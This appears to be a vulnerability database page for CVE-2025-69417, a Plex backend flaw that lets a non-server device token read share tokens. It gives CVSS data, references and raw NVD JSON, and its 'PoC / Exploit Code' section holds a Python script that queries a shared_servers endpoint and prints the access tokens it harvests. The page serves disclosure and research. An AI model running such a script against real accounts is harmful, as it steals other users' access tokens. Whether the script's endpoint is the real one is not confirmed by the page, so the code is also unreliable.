CVE-2025-69417

Description

In the plex.tv backend for Plex Media Server (PMS) through 2025-12-31, a non-server device token can retrieve share tokens (intended for unrelated access) via a shared_servers endpoint.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:plex:media_server:*:*:*:*:*:*:*:* - VULNERABLE

Plex Media Server < 2025-12-31所有版本

Plex Media Server (PMS) through 2025-12-31

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-69417 PoC - Plex Media Server Share Token Retrieval # This PoC demonstrates retrieving share tokens using a non-server device token import requests import json import sys def exploit_plex_share_token(base_url, device_token, username): """ Exploit for CVE-2025-69417 Attempts to retrieve share tokens using a non-server device token Args: base_url: Plex server base URL (e.g., https://plex.tv) device_token: Valid device token from a non-server device username: Username for authentication Returns: List of retrieved share tokens """ headers = { 'X-Plex-Product': 'Plex Media Server', 'X-Plex-Version': '1.32.0', 'X-Plex-Client-Identifier': 'cve-2025-69417-poc', 'X-Plex-Device': 'Non-Server-Device', 'X-Plex-Device-Name': 'AttackDevice', 'Authorization': f'Bearer {device_token}' } # Target endpoint that should only be accessible by server devices endpoint = f'{base_url}/api/v2/servers/shared_servers' try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: data = response.json() share_tokens = extract_share_tokens(data) print(f'[+] Successfully retrieved {len(share_tokens)} share tokens') for token in share_tokens: print(f' Token: {token}') return share_tokens elif response.status_code == 401: print('[-] Authentication failed - invalid device token') elif response.status_code == 403: print('[-] Access denied - token type validation working') else: print(f'[-] Unexpected response: {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return [] def extract_share_tokens(data): """Extract share tokens from API response""" tokens = [] if isinstance(data, dict) and 'sharedServers' in data: for server in data['sharedServers']: if 'accessToken' in server: tokens.append(server['accessToken']) elif isinstance(data, list): for item in data: tokens.extend(extract_share_tokens(item)) return tokens if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve-2025-69417.py <base_url> <device_token> <username>') print('Example: python cve-2025-69417.py https://plex.tv abc123def456 [email protected]') sys.exit(1) exploit_plex_share_token(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69417
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69417
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69417/
[4] VulDB https://vuldb.com/cve/CVE-2025-69417
[5] https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69417", "sourceIdentifier": "[email protected]", "published": "2026-01-02T17:16:24.613", "lastModified": "2026-02-27T15:08:04.963", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "In the plex.tv backend for Plex Media Server (PMS) through 2025-12-31, a non-server device token can retrieve share tokens (intended for unrelated access) via a shared_servers endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plex:media_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.43.0.10389", "matchCriteriaId": "19041920-FA20-41C9-801F-6A402B9F0DD5"}]}]}], "references": [{"url": "https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}